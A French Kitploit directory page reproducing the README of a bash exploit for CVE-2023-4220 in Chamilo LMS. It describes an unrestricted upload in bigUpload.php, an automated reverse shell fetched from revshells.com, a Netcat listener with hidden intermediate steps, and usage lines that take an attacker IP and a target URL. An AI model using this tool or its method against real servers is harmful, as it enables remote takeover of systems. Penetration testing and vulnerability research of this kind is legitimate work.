Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Chamilo-LMS-CVE-2023-4220-Exploit — Refurbish Chamilo LMS CVE-2023-4220 exploit écrit en bash | Kitploit
Outils/GitHubGitHub/0xdtc/chamilo-lms-cve-2023-4220-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHub0xdtc/chamilo-lms-cve-2023-4220-exploit

Chamilo-LMS-CVE-2023-4220-Exploit

Refurbish Chamilo LMS CVE-2023-4220 exploit écrit en bash

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Chamilo LMS CVE-2023-4220 Exploit

Aperçu

Ce script exploite une vulnérabilité d'exécution de code à distance (RCE) dans Chamilo LMS versions ≤ v1.11.24. La vulnérabilité (CVE-2023-4220) existe en raison d'une fonctionnalité de téléchargement de fichier sans restriction dans la fonction bigUpload.php de Chamilo LMS, qui permet aux attaquants de télécharger des fichiers arbitraires (tels que des webshells) et de les exécuter, conduisant à une exécution complète de code à distance sur le serveur.

Ce script a été amélioré par Divine Clown pour rationaliser le processus d'exploitation, en générant automatiquement un fichier de reverse shell, en le téléchargeant sur la cible, et en lançant un écouteur pour donner à l'attaquant un accès direct au shell.


Détails du CVE

  • Identifiant CVE : CVE-2023-4220
  • Logiciel affecté : Chamilo LMS ≤ v1.11.24
  • Type de vulnérabilité : Exécution de code à distance (RCE)
  • Vecteur d'attaque : Téléchargement de fichier sans restriction dans /main/inc/lib/javascript/bigupload/inc/bigUpload.php

Fonctionnalités

  • Télécharge automatiquement un reverse shell depuis revshells.com basé sur l'IP et le port de l'attaquant.
  • Télécharge le reverse shell en utilisant le point d'accès vulnérable bigUpload.php.
  • Déclenche silencieusement le shell et ouvre un écouteur Netcat pour un accès direct.

Amélioration par Divine Clown :

  • Toutes les étapes intermédiaires (téléchargement du shell, upload, etc.) sont masquées, n'affichant que le reverse shell résultant pour une utilisation simplifiée.

Utilisation

root@kitploit:~
./CVE-2023-4220.sh -i <attacker_ip> -p <port> -h <host_link>

Paramètres :

  • -i <attacker_ip> : L'adresse IP de l'attaquant pour le reverse shell.
  • -p <port> : Le port sur lequel l'écouteur Netcat sera démarré.
  • -h <host_link> : L'URL complète de l'instance vulnérable de Chamilo LMS.

Exemple :

root@kitploit:~
./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com

Prérequis

  • Netcat installé sur votre machine.
  • Assurez-vous que la version cible de Chamilo LMS est vulnérable (≤ v1.11.24).
  • Autorisations appropriées pour effectuer des tests de pénétration ou des exploitations.

Analyse technique

  1. Le script télécharge un reverse shell depuis revshells.com, en le générant dynamiquement en fonction de l'IP et du port de l'attaquant.
  2. Le reverse shell est téléchargé vers le point d'accès vulnérable bigUpload.php.
  3. Le fichier téléchargé est exécuté en accédant à son URL sur le serveur.
  4. Un écouteur Netcat est démarré, et une fois le fichier déclenché, une connexion reverse shell est établie, donnant à l'attaquant un accès en ligne de commande.

Avertissement légal

Cet outil est destiné uniquement à des fins éducatives et à des environnements de test où vous avez une autorisation explicite pour exploiter des vulnérabilités. L'accès non autorisé aux systèmes est illégal et peut entraîner des poursuites pénales. Les auteurs ne seront pas tenus responsables de toute mauvaise utilisation ou des dommages causés par ce script.


Crédits

  • Auteur de l'exploit original : Ziad Sakr @Ziad-Sakr
  • Améliorations et perfectionnements : Moi (Divine Clown)

N'hésitez pas à modifier ce README davantage si vous souhaitez inclure des informations ou une mise en forme supplémentaires ! Faites-moi savoir si vous avez besoin d'autre chose.

Télécharger l’outil